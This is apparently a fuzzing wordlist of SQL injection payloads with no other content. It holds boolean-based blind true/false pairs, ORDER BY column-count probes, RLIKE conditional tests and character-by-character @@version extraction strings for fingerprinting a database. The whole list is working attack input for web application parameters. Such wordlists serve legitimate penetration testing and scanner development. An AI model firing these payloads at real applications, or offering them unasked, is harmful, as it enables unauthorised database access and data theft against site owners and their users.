1 OR 1=0
1 OR x=y
1 OR 1=0#
1 OR x=y#
1 OR 1=0--
1 OR x=y--
1 OR 3409=3409 AND ('pytW' LIKE 'pytW
1 OR 3409=3409 AND ('pytW' LIKE 'pytY
1 HAVING 1=0
1 HAVING 1=0#
1 HAVING 1=0--
1 AND 1=0
1 AND 1=0--
1 AND 1=0#
1 AND 1=0 AND '%'='
1 AND 1083=1083 AND (1427=1427
1 AND 7506=9091 AND (5913=5913
1 AND 1083=1083 AND ('1427=1427
1 AND 7506=9091 AND ('5913=5913
1 AND 7300=7300 AND 'pKlZ'='pKlZ
1 AND 7300=7300 AND 'pKlZ'='pKlY
1 AS INJECTX WHERE 1=1 AND 1=0
1 AS INJECTX WHERE 1=1 AND 1=0#
1 AS INJECTX WHERE 1=1 AND 1=0--
1 WHERE 1=1 AND 1=0
1 WHERE 1=1 AND 1=0#
1 WHERE 1=1 AND 1=0--
1 ORDER BY 1--
1 ORDER BY 31337--
1 ORDER BY 31337#
1 ORDER BY 31337
1 RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
1 RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
1 %' AND 8310=8310 AND '%'='
1 %' AND 8310=8311 AND '%'='
1 and (select substring(@@version,1,1))='X'
1 and (select substring(@@version,1,1))='M'
1 and (select substring(@@version,2,1))='i'
1 and (select substring(@@version,2,1))='y'
1 and (select substring(@@version,3,1))='c'
1 and (select substring(@@version,3,1))='S'
1 and (select substring(@@version,3,1))='X'